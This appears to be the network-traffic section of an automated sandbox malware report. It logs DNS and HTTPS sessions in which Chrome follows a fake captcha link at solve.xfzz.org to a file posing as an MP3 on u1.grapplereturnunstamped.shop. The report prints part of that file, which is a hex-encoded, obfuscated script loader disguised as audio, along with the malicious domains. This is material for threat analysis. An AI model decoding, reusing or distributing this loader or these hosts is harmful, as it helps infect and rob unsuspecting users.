                Jan 16, 2025 08:08:27.888514996 CET44349874142.250.186.164192.168.2.4
                Jan 16, 2025 08:08:27.889045000 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:27.889072895 CET44349874142.250.186.164192.168.2.4
                Jan 16, 2025 08:08:27.889909029 CET44349874142.250.186.164192.168.2.4
                Jan 16, 2025 08:08:27.890392065 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:27.890480042 CET44349874142.250.186.164192.168.2.4
                Jan 16, 2025 08:08:27.932837963 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:37.796075106 CET44349874142.250.186.164192.168.2.4
                Jan 16, 2025 08:08:37.796224117 CET44349874142.250.186.164192.168.2.4
                Jan 16, 2025 08:08:37.796276093 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:39.434811115 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:39.434830904 CET44349874142.250.186.164192.168.2.4
                TimestampSource PortDest PortSource IPDest IP
                Jan 16, 2025 08:07:23.123040915 CET53639211.1.1.1192.168.2.4
                Jan 16, 2025 08:07:23.154381990 CET53584631.1.1.1192.168.2.4
                Jan 16, 2025 08:07:24.249453068 CET53518841.1.1.1192.168.2.4
                Jan 16, 2025 08:07:27.168643951 CET6459853192.168.2.41.1.1.1
                Jan 16, 2025 08:07:27.168772936 CET4918853192.168.2.41.1.1.1
                Jan 16, 2025 08:07:27.175501108 CET53491881.1.1.1192.168.2.4
                Jan 16, 2025 08:07:27.175573111 CET53645981.1.1.1192.168.2.4
                Jan 16, 2025 08:07:29.238416910 CET5915453192.168.2.41.1.1.1
                Jan 16, 2025 08:07:29.238744974 CET5357153192.168.2.41.1.1.1
                Jan 16, 2025 08:07:29.257323980 CET53535711.1.1.1192.168.2.4
                Jan 16, 2025 08:07:29.365828037 CET53591541.1.1.1192.168.2.4
                Jan 16, 2025 08:07:31.396162987 CET138138192.168.2.4192.168.2.255
                Jan 16, 2025 08:07:32.675431967 CET6259553192.168.2.41.1.1.1
                Jan 16, 2025 08:07:32.675571918 CET6168953192.168.2.41.1.1.1
                Jan 16, 2025 08:07:32.686902046 CET53625951.1.1.1192.168.2.4
                Jan 16, 2025 08:07:32.687787056 CET53616891.1.1.1192.168.2.4
                Jan 16, 2025 08:07:34.016048908 CET5029453192.168.2.41.1.1.1
                Jan 16, 2025 08:07:34.016048908 CET5048453192.168.2.41.1.1.1
                Jan 16, 2025 08:07:34.023096085 CET53504841.1.1.1192.168.2.4
                Jan 16, 2025 08:07:34.023170948 CET53502941.1.1.1192.168.2.4
                Jan 16, 2025 08:07:41.175522089 CET53623031.1.1.1192.168.2.4
                Jan 16, 2025 08:08:00.192296028 CET53560091.1.1.1192.168.2.4
                Jan 16, 2025 08:08:22.799559116 CET53596521.1.1.1192.168.2.4
                Jan 16, 2025 08:08:22.865014076 CET53654451.1.1.1192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jan 16, 2025 08:07:27.168643951 CET192.168.2.41.1.1.10x3a7fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:27.168772936 CET192.168.2.41.1.1.10xcb45Standard query (0)www.google.com65IN (0x0001)false
                Jan 16, 2025 08:07:29.238416910 CET192.168.2.41.1.1.10xcfaaStandard query (0)solve.xfzz.orgA (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.238744974 CET192.168.2.41.1.1.10x7233Standard query (0)solve.xfzz.org65IN (0x0001)false
                Jan 16, 2025 08:07:32.675431967 CET192.168.2.41.1.1.10x6453Standard query (0)u1.grapplereturnunstamped.shopA (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:32.675571918 CET192.168.2.41.1.1.10x866eStandard query (0)u1.grapplereturnunstamped.shop65IN (0x0001)false
                Jan 16, 2025 08:07:34.016048908 CET192.168.2.41.1.1.10xa5eeStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:34.016048908 CET192.168.2.41.1.1.10x45b3Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jan 16, 2025 08:07:27.175501108 CET1.1.1.1192.168.2.40xcb45No error (0)www.google.com65IN (0x0001)false
                Jan 16, 2025 08:07:27.175573111 CET1.1.1.1192.168.2.40x3a7fNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.257323980 CET1.1.1.1192.168.2.40x7233No error (0)solve.xfzz.org65IN (0x0001)false
                Jan 16, 2025 08:07:29.365828037 CET1.1.1.1192.168.2.40xcfaaNo error (0)solve.xfzz.org104.21.32.1A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.365828037 CET1.1.1.1192.168.2.40xcfaaNo error (0)solve.xfzz.org104.21.16.1A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.365828037 CET1.1.1.1192.168.2.40xcfaaNo error (0)solve.xfzz.org104.21.80.1A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.365828037 CET1.1.1.1192.168.2.40xcfaaNo error (0)solve.xfzz.org104.21.112.1A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.365828037 CET1.1.1.1192.168.2.40xcfaaNo error (0)solve.xfzz.org104.21.64.1A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.365828037 CET1.1.1.1192.168.2.40xcfaaNo error (0)solve.xfzz.org104.21.96.1A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:29.365828037 CET1.1.1.1192.168.2.40xcfaaNo error (0)solve.xfzz.org104.21.48.1A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:32.686902046 CET1.1.1.1192.168.2.40x6453No error (0)u1.grapplereturnunstamped.shop172.67.215.98A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:32.686902046 CET1.1.1.1192.168.2.40x6453No error (0)u1.grapplereturnunstamped.shop104.21.78.33A (IP address)IN (0x0001)false
                Jan 16, 2025 08:07:32.687787056 CET1.1.1.1192.168.2.40x866eNo error (0)u1.grapplereturnunstamped.shop65IN (0x0001)false
                Jan 16, 2025 08:07:34.023170948 CET1.1.1.1192.168.2.40xa5eeNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                • solve.xfzz.org
                • u1.grapplereturnunstamped.shop
                • https:
                • a.nel.cloudflare.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449742104.21.32.14432640C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-16 07:07:30 UTC709OUTGET /awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69 HTTP/1.1
                Host: solve.xfzz.org
                Connection: keep-alive
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                sec-ch-ua-platform: "Windows"
                Upgrade-Insecure-Requests: 1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: navigate
                Sec-Fetch-User: ?1
                Sec-Fetch-Dest: document
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                2025-01-16 07:07:32 UTC857INHTTP/1.1 302 Found
                Date: Thu, 16 Jan 2025 07:07:32 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Location: https://u1.grapplereturnunstamped.shop/sh_UJAF3.mp3
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ru9eZWR3JNZ28OeL1ghf0KU4HcALgMqBsSaFYc2BHCEk%2FdPew2zaEyI%2BTR7mtmRqgSkrNPB8PvJv474HqsYUbRPZVvyn2Lqr5AikyIKbpXwUuX%2FA2l2Sy3NfG2hDzVtjpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 902c44db191ac327-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1509&rtt_var=571&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3027&recv_bytes=1287&delivery_rate=2902584&cwnd=190&unsent_bytes=0&cid=63d1c9ec68303bd3&ts=2355&x=0"
                2025-01-16 07:07:32 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449745172.67.215.984432640C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-16 07:07:33 UTC685OUTGET /sh_UJAF3.mp3 HTTP/1.1
                Host: u1.grapplereturnunstamped.shop
                Connection: keep-alive
                Upgrade-Insecure-Requests: 1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: navigate
                Sec-Fetch-User: ?1
                Sec-Fetch-Dest: document
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                sec-ch-ua-platform: "Windows"
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                2025-01-16 07:07:33 UTC967INHTTP/1.1 200 OK
                Date: Thu, 16 Jan 2025 07:07:33 GMT
                Content-Type: audio/mpeg
                Content-Length: 537548
                Connection: close
                Accept-Ranges: bytes
                ETag: "3132c2edd46f7894523b2724ef976ef7"
                Last-Modified: Wed, 15 Jan 2025 11:25:21 GMT
                Vary: Accept-Encoding
                cf-cache-status: DYNAMIC
                Server-Timing: cfCacheStatus;desc="DYNAMIC"
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uetpqd6yL5kqgaix3PQi1gR%2FXNZng2n5xYYxSXQowBJV7ozSkITO8w%2BiQVC8YFNKCpvNVK7dEA06FCdXQWehWq8wDflCboh5qVRTVzOMDaruYT9oVirs28mco4vuxow9sE1aKRXfpRl%2FEDqnG0QO7V0%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 902c44efedba7fe2-IAD
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=7015&min_rtt=7012&rtt_var=2635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2879&recv_bytes=1263&delivery_rate=414949&cwnd=32&unsent_bytes=0&cid=03230707b58745ef&ts=315&x=0"
                2025-01-16 07:07:33 UTC402INData Raw: 36 36 6f 37 35 53 36 65 65 36 33 64 37 34 6c 36 39 54 36 66 71 36 65 6b 32 30 64 37 34 6c 35 35 77 37 37 4c 36 63 41 37 61 64 35 34 6e 32 38 47 36 33 67 36 31 48 34 66 42 36 39 66 32 39 7a 37 62 70 37 36 73 36 31 49 37 32 49 32 30 63 35 36 58 34 64 63 36 61 4b 35 61 52 36 62 43 37 61 47 33 64 62 32 30 71 32 37 68 32 37 75 33 62 46 36 36 76 36 66 79 37 32 67 32 30 59 32 38 6a 37 36 55 36 31 4c 37 32 69 32 30 76 34 66 63 35 35 78 37 38 62 37 37 63 36 36 57 34 38 6c 32 30 64 33 64 74 32 30 64 33 30 7a 33 62 61 34 66 56 35 35 55 37 38 49 37 37 77 36 36 4e 34 38 61 32 30 4c 33 63 69 32 30 71 36 33 6a 36 31 4a 34 66 76 36 39 74 32 65 42 36 63 6b 36 35 4a 36 65 56 36 37 48 37 34 50 36 38 56 33 62 68 32 30 5a 34 66 4d 35 35 7a 37 38 61 37 37 42 36 36 69 34 38 76
                Data Ascii: 66o75S6ee63d74l69T6fq6ek20d74l55w77L6cA7ad54n28G63g61H4fB69f29z7bp76s61I72I20c56X4dc6aK5aR6bC7aG3db20q27h27u3bF66v6fy72g20Y28j76U61L72i20v4fc55x78b77c66W48l20d3dt20d30z3ba4fV55U78I77w66N48a20L3ci20q63j61J4fv69t2eB6ck65J6eV67H74P68V3bh20Z4fM55z78a77B66i48v
                2025-01-16 07:07:33 UTC1369INData Raw: 32 64 41 32 30 68 33 32 59 33 32 54 33 35 48 32 39 4a 33 62 70 35 36 55 34 64 77 36 61 41 35 61 45 36 62 61 37 61 6e 32 30 53 33 64 68 32 30 4e 35 36 79 34 64 52 36 61 72 35 61 4c 36 62 64 37 61 4a 32 30 57 32 62 6f 32 30 49 34 34 4a 37 34 63 36 36 4a 35 39 58 36 33 70 37 64 47 37 32 52 36 35 6f 37 34 4f 37 35 48 37 32 62 36 65 78 32 30 73 35 36 6c 34 64 48 36 61 62 35 61 74 36 62 46 37 61 76 37 64 49 33 62 7a 37 36 65 36 31 72 37 32 6c 32 30 58 35 36 79 34 64 70 36 61 55 35 61 74 36 62 44 37 61 71 32 30 4b 33 64 6b 32 30 4c 37 34 78 35 35 68 37 37 67 36 63 77 37 61 47 35 34 74 32 38 6e 35 62 6c 33 33 59 33 33 4b 33 37 46 32 63 51 33 33 46 33 33 67 33 36 6b 32 63 6b 33 33 6a 33 34 45 33 34 62 32 63 67 33 33 4a 33 32 66 33 36 6b 32 63 58 33 33 41 33 33 71
                Data Ascii: 2dA20h32Y32T35H29J3bp56U4dw6aA5aE6ba7an20S3dh20N56y4dR6ar5aL6bd7aJ20W2bo20I44J74c66J59X63p7dG72R65o74O75H72b6ex20s56l4dH6ab5at6bF7av7dI3bz76e61r72l20X56y4dp6aU5at6bD7aq20K3dk20L74x55h77g6cw7aG54t28n5bl33Y33K37F2cQ33F33g36k2ck33j34E34b2cg33J32f36k2cX33A33q
                2025-01-16 07:07:33 UTC1369INData Raw: 32 71 33 36 79 32 63 50 33 32 45 33 39 6f 33 30 68 32 63 51 33 32 65 33 39 69 33 31 61 32 63 41 33 33 43 33 30 54 33 39 54 32 63 4f 33 32 4a 33 39 45 33 30 4d 32 63 59 33 32 59 33 39 78 33 36 46 32 63 6c 33 33 75 33 32 79 33 38 57 32 63 72 33 32 62 33 39 48 33 30 4e 32 63 75 33 33 51 33 32 51 33 33 57 32 63 67 33 33 46 33 30 52 33 36 53 32 63 4b 33 32 46 33 39 68 33 30 4e 32 63 52 33 32 44 33 37 4a 33 34 54 32 63 52 33 32 66 33 39 49 33 30 42 32 63 4d 33 32 50 33 39 68 33 36 73 32 63 66 33 32 6c 33 39 4d 33 34 56 32 63 47 33 32 52 33 39 71 33 30 6f 32 63 57 33 33 56 33 32 66 33 35 6b 32 63 6d 33 33 77 33 30 6d 33 36 4a 32 63 72 33 32 6c 33 39 43 33 31 53 32 63 72 33 33 6b 33 30 6e 33 31 69 32 63 6b 33 32 65 33 39 46 33 30 4c 32 63 53 33 32 46 33 39 41 33
                Data Ascii: 2q36y2cP32E39o30h2cQ32e39i31a2cA33C30T39T2cO32J39E30M2cY32Y39x36F2cl33u32y38W2cr32b39H30N2cu33Q32Q33W2cg33F30R36S2cK32F39h30N2cR32D37J34T2cR32f39I30B2cM32P39h36s2cf32l39M34V2cG32R39q30o2cW33V32f35k2cm33w30m36J2cr32l39C31S2cr33k30n31i2ck32e39F30L2cS32F39A3
                2025-01-16 07:07:33 UTC1369INData Raw: 70 33 31 56 32 63 4c 33 33 41 33 30 57 33 35 58 32 63 45 33 32 72 33 39 67 33 30 67 32 63 48 33 32 76 33 39 4b 33 33 72 32 63 44 33 33 41 33 32 48 33 38 52 32 63 74 33 32 75 33 39 54 33 30 57 32 63 59 33 33 64 33 32 49 33 33 62 32 63 58 33 33 42 33 32 43 33 38 68 32 63 63 33 32 70 33 39 54 33 31 68 32 63 61 33 33 4b 33 33 54 33 30 68 32 63 54 33 32 64 33 39 6b 33 30 57 32 63 76 33 32 52 33 39 64 33 36 41 32 63 4f 33 33 59 33 33 79 33 32 59 32 63 58 33 32 57 33 39 4c 33 30 45 32 63 42 33 33 53 33 30 78 33 33 69 32 63 72 33 32 75 33 39 41 33 30 44 32 63 6f 33 32 79 33 39 44 33 31 52 32 63 62 33 33 64 33 34 52 33 34 74 32 63 68 33 32 61 33 39 78 33 30 51 32 63 4a 33 32 77 33 39 62 33 34 48 32 63 7a 33 32 48 33 37 4d 33 33 79 32 63 44 33 32 65 33 39 4a 33 30
                Data Ascii: p31V2cL33A30W35X2cE32r39g30g2cH32v39K33r2cD33A32H38R2ct32u39T30W2cY33d32I33b2cX33B32C38h2cc32p39T31h2ca33K33T30h2cT32d39k30W2cv32R39d36A2cO33Y33y32Y2cX32W39L30E2cB33S30x33i2cr32u39A30D2co32y39D31R2cb33d34R34t2ch32a39x30Q2cJ32w39b34H2cz32H37M33y2cD32e39J30
                2025-01-16 07:07:33 UTC1369INData Raw: 33 30 7a 32 63 48 33 32 4e 33 39 46 33 34 6c 32 63 44 33 33 54 33 31 74 33 30 70 32 63 4d 33 32 46 33 39 65 33 30 6c 32 63 47 33 33 54 33 31 69 33 35 50 32 63 56 33 33 54 33 34 4b 33 34 42 32 63 73 33 32 62 33 39 4e 33 31 75 32 63 41 33 33 4e 33 34 42 33 36 58 32 63 6a 33 32 66 33 39 68 33 30 50 32 63 74 33 32 61 33 39 76 33 35 7a 32 63 65 33 33 55 33 31 6f 33 34 62 32 63 47 33 32 53 33 39 74 33 30 68 32 63 47 33 33 6e 33 32 67 33 34 59 32 63 73 33 33 4f 33 32 64 33 38 4e 32 63 75 33 32 46 33 39 48 33 31 67 32 63 7a 33 33 4b 33 32 6c 33 39 71 32 63 52 33 32 57 33 39 47 33 30 67 32 63 58 33 32 4f 33 39 72 33 37 66 32 63 59 33 33 6a 33 30 6c 33 36 42 32 63 65 33 32 69 33 39 76 33 30 61 32 63 68 33 33 67 33 30 6f 33 39 4d 32 63 67 33 33 64 33 34 66 33 34 55
                Data Ascii: 30z2cH32N39F34l2cD33T31t30p2cM32F39e30l2cG33T31i35P2cV33T34K34B2cs32b39N31u2cA33N34B36X2cj32f39h30P2ct32a39v35z2ce33U31o34b2cG32S39t30h2cG33n32g34Y2cs33O32d38N2cu32F39H31g2cz33K32l39q2cR32W39G30g2cX32O39r37f2cY33j30l36B2ce32i39v30a2ch33g30o39M2cg33d34f34U
                2025-01-16 07:07:33 UTC1369INData Raw: 30 50 32 63 66 33 32 79 33 39 46 33 30 6e 32 63 5a 33 33 49 33 31 7a 33 32 72 32 63 72 33 33 6b 33 30 74 33 36 79 32 63 4b 33 32 76 33 39 6f 33 31 5a 32 63 6c 33 33 52 33 33 4a 33 31 4f 32 63 6a 33 32 6c 33 39 64 33 30 61 32 63 76 33 32 42 33 39 59 33 36 47 32 63 6d 33 32 48 33 39 72 33 34 44 32 63 63 33 32 68 33 39 69 33 30 6e 32 63 6d 33 33 71 33 31 43 33 35 6c 32 63 69 33 32 67 33 39 43 33 30 4e 32 63 53 33 32 6f 33 39 62 33 31 74 32 63 4c 33 33 47 33 33 59 33 35 48 32 63 4b 33 32 50 33 39 66 33 30 75 32 63 55 33 32 65 33 39 72 33 35 58 32 63 6b 33 32 74 33 39 46 33 30 6b 32 63 74 33 32 70 33 39 56 33 30 63 32 63 4e 33 33 41 33 32 6e 33 33 75 32 63 50 33 33 59 33 34 66 33 34 44 32 63 69 33 32 51 33 39 49 33 31 48 32 63 61 33 32 65 33 39 75 33 36 66 32
                Data Ascii: 0P2cf32y39F30n2cZ33I31z32r2cr33k30t36y2cK32v39o31Z2cl33R33J31O2cj32l39d30a2cv32B39Y36G2cm32H39r34D2cc32h39i30n2cm33q31C35l2ci32g39C30N2cS32o39b31t2cL33G33Y35H2cK32P39f30u2cU32e39r35X2ck32t39F30k2ct32p39V30c2cN33A32n33u2cP33Y34f34D2ci32Q39I31H2ca32e39u36f2
                2025-01-16 07:07:33 UTC1369INData Raw: 6f 32 63 4d 33 33 42 33 30 46 33 36 6e 32 63 65 33 32 43 33 39 50 33 31 6e 32 63 76 33 33 44 33 34 70 33 37 46 32 63 78 33 32 45 33 39 49 33 30 52 32 63 48 33 32 63 33 39 4f 33 34 74 32 63 65 33 33 63 33 32 54 33 38 4e 32 63 49 33 32 41 33 39 4a 33 30 7a 32 63 46 33 33 62 33 32 4f 33 32 72 32 63 52 33 32 6f 33 39 42 33 30 6b 32 63 76 33 32 43 33 39 6a 33 31 77 32 63 63 33 32 50 33 37 71 33 36 4a 32 63 71 33 32 45 33 39 6e 33 30 74 32 63 4d 33 32 71 33 39 69 33 36 57 32 63 4c 33 33 64 33 30 4b 33 36 6b 32 63 68 33 32 73 33 39 65 33 30 65 32 63 74 33 33 50 33 30 68 33 39 55 32 63 70 33 33 79 33 30 6e 33 36 4a 32 63 44 33 32 59 33 39 56 33 31 46 32 63 73 33 33 53 33 33 52 33 36 4f 32 63 6c 33 32 4b 33 39 58 33 30 45 32 63 4d 33 32 50 33 39 6e 33 36 50 32 63
                Data Ascii: o2cM33B30F36n2ce32C39P31n2cv33D34p37F2cx32E39I30R2cH32c39O34t2ce33c32T38N2cI32A39J30z2cF33b32O32r2cR32o39B30k2cv32C39j31w2cc32P37q36J2cq32E39n30t2cM32q39i36W2cL33d30K36k2ch32s39e30e2ct33P30h39U2cp33y30n36J2cD32Y39V31F2cs33S33R36O2cl32K39X30E2cM32P39n36P2c
                2025-01-16 07:07:33 UTC1369INData Raw: 32 63 65 33 32 53 33 37 41 33 33 43 32 63 50 33 32 76 33 39 75 33 30 74 32 63 69 33 32 54 33 39 6d 33 35 79 32 63 72 33 32 73 33 39 5a 33 30 4a 32 63 6b 33 32 43 33 39 68 33 30 57 32 63 6e 33 33 55 33 31 66 33 34 63 32 63 5a 33 33 67 33 30 48 33 36 66 32 63 58 33 32 42 33 39 48 33 31 4b 32 63 58 33 32 77 33 39 51 33 31 42 32 63 65 33 32 62 33 39 43 33 30 7a 32 63 52 33 32 52 33 39 5a 33 33 4c 32 63 70 33 33 41 33 30 46 33 32 4e 32 63 5a 33 32 57 33 39 46 33 30 4c 32 63 63 33 33 6a 33 31 47 33 31 4b 32 63 6e 33 33 59 33 34 63 33 34 6a 32 63 6e 33 32 50 33 39 57 33 31 67 32 63 4d 33 33 62 33 34 62 33 36 76 32 63 62 33 32 59 33 39 66 33 30 49 32 63 41 33 32 68 33 39 46 33 37 57 32 63 75 33 33 55 33 33 6e 33 36 5a 32 63 62 33 32 75 33 39 47 33 30 41 32 63 77
                Data Ascii: 2ce32S37A33C2cP32v39u30t2ci32T39m35y2cr32s39Z30J2ck32C39h30W2cn33U31f34c2cZ33g30H36f2cX32B39H31K2cX32w39Q31B2ce32b39C30z2cR32R39Z33L2cp33A30F32N2cZ32W39F30L2cc33j31G31K2cn33Y34c34j2cn32P39W31g2cM33b34b36v2cb32Y39f30I2cA32h39F37W2cu33U33n36Z2cb32u39G30A2cw
                2025-01-16 07:07:33 UTC1369INData Raw: 63 41 33 32 52 33 39 59 33 33 68 32 63 49 33 33 64 33 30 42 33 32 6b 32 63 59 33 32 70 33 39 48 33 30 4b 32 63 45 33 33 64 33 30 57 33 32 77 32 63 50 33 32 57 33 39 7a 33 30 4a 32 63 64 33 32 48 33 39 49 33 30 55 32 63 44 33 33 79 33 34 41 33 35 56 32 63 52 33 32 59 33 39 58 33 30 62 32 63 50 33 32 72 33 39 66 33 33 69 32 63 52 33 33 42 33 31 51 33 30 52 32 63 57 33 32 6b 33 39 52 33 30 4d 32 63 75 33 33 45 33 31 45 33 32 62 32 63 73 33 32 45 33 39 5a 33 30 42 32 63 67 33 32 6f 33 39 68 33 31 73 32 63 49 33 32 44 33 37 65 33 35 4b 32 63 63 33 32 67 33 39 53 33 30 7a 32 63 52 33 32 66 33 39 75 33 37 4d 32 63 78 33 33 6f 33 30 66 33 32 4f 32 63 46 33 32 69 33 39 6e 33 30 73 32 63 70 33 33 77 33 32 5a 33 36 7a 32 63 74 33 33 5a 33 32 64 33 38 4e 32 63 79 33
                Data Ascii: cA32R39Y33h2cI33d30B32k2cY32p39H30K2cE33d30W32w2cP32W39z30J2cd32H39I30U2cD33y34A35V2cR32Y39X30b2cP32r39f33i2cR33B31Q30R2cW32k39R30M2cu33E31E32b2cs32E39Z30B2cg32o39h31s2cI32D37e35K2cc32g39S30z2cR32f39u37M2cx33o30f32O2cF32i39n30s2cp33w32Z36z2ct33Z32d38N2cy3
                2025-01-16 07:07:33 UTC1369INData Raw: 70 33 32 68 33 39 4f 33 30 49 32 63 58 33 33 62 33 31 66 33 30 45 32 63 48 33 33 6b 33 32 62 33 38 62 32 63 5a 33 32 42 33 39 64 33 31 79 32 63 6d 33 33 6a 33 30 61 33 33 4b 32 63 4a 33 32 6d 33 39 6b 33 30 6f 32 63 6b 33 32 6c 33 39 7a 33 36 4c 32 63 48 33 33 57 33 30 50 33 32 58 32 63 52 33 32 4f 33 39 4c 33 30 52 32 63 56 33 33 58 33 31 65 33 32 64 32 63 63 33 33 68 33 30 79 33 36 6d 32 63 41 33 32 74 33 39 57 33 31 6e 32 63 62 33 33 64 33 34 4d 33 30 6f 32 63 58 33 32 66 33 39 6e 33 30 43 32 63 78 33 32 61 33 39 58 33 35 6d 32 63 62 33 32 54 33 39 77 33 34 6b 32 63 55 33 32 44 33 39 4a 33 30 4c 32 63 70 33 33 4d 33 32 63 33 33 50 32 63 46 33 33 77 33 34 69 33 34 63 32 63 6e 33 32 79 33 39 6e 33 31 72 32 63 4f 33 33 4c 33 30 6b 33 33 64 32 63 4a 33 32
                Data Ascii: p32h39O30I2cX33b31f30E2cH33k32b38b2cZ32B39d31y2cm33j30a33K2cJ32m39k30o2ck32l39z36L2cH33W30P32X2cR32O39L30R2cV33X31e32d2cc33h30y36m2cA32t39W31n2cb33d34M30o2cX32f39n30C2cx32a39X35m2cb32T39w34k2cU32D39J30L2cp33M32c33P2cF33w34i34c2cn32y39n31r2cO33L30k33d2cJ32


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.44974635.190.80.14432640C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-16 07:07:34 UTC571OUTOPTIONS /report/v4?s=Uetpqd6yL5kqgaix3PQi1gR%2FXNZng2n5xYYxSXQowBJV7ozSkITO8w%2BiQVC8YFNKCpvNVK7dEA06FCdXQWehWq8wDflCboh5qVRTVzOMDaruYT9oVirs28mco4vuxow9sE1aKRXfpRl%2FEDqnG0QO7V0%3D HTTP/1.1
                Host: a.nel.cloudflare.com
                Connection: keep-alive
                Origin: https://u1.grapplereturnunstamped.shop
                Access-Control-Request-Method: POST
                Access-Control-Request-Headers: content-type
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                2025-01-16 07:07:34 UTC336INHTTP/1.1 200 OK
                Content-Length: 0
                access-control-max-age: 86400
                access-control-allow-methods: OPTIONS, POST
                access-control-allow-origin: *
                access-control-allow-headers: content-type, content-length
                date: Thu, 16 Jan 2025 07:07:34 GMT
                Via: 1.1 google
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.449748172.67.215.984432640C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-16 07:07:34 UTC587OUTGET /sh_UJAF3.mp3 HTTP/1.1
                Host: u1.grapplereturnunstamped.shop
                Connection: keep-alive
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                Accept-Encoding: identity;q=1, *;q=0
                sec-ch-ua-mobile: ?0
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                sec-ch-ua-platform: "Windows"
                Accept: */*
                Sec-Fetch-Site: same-origin
                Sec-Fetch-Mode: no-cors
                Sec-Fetch-Dest: video
                Referer: https://u1.grapplereturnunstamped.shop/sh_UJAF3.mp3
                Accept-Language: en-US,en;q=0.9
                Range: bytes=0-
                2025-01-16 07:07:35 UTC975INHTTP/1.1 206 Partial Content
                Date: Thu, 16 Jan 2025 07:07:35 GMT
                Content-Type: audio/mpeg
                Content-Length: 537548
                Connection: close
                Content-Range: bytes 0-537547/537548
                Accept-Ranges: bytes
                ETag: "3132c2edd46f7894523b2724ef976ef7"
                Last-Modified: Wed, 15 Jan 2025 11:25:21 GMT
                Vary: Accept-Encoding
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8okjgoQB0EHcDUv7pEKcFiClvFUrFhLxmjVhdQG8gDyb936V67rvN78aTbR7yJtgoGVjBAGfpA3LNc4nmJ%2BM2T%2FWt5UG9MYDp1WozWueEmPcaiamtbIk6QVL8FBRTrWcZtT%2FCRN0i8GaZhcv2%2FnsxUw%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 902c44f8599858c0-IAD
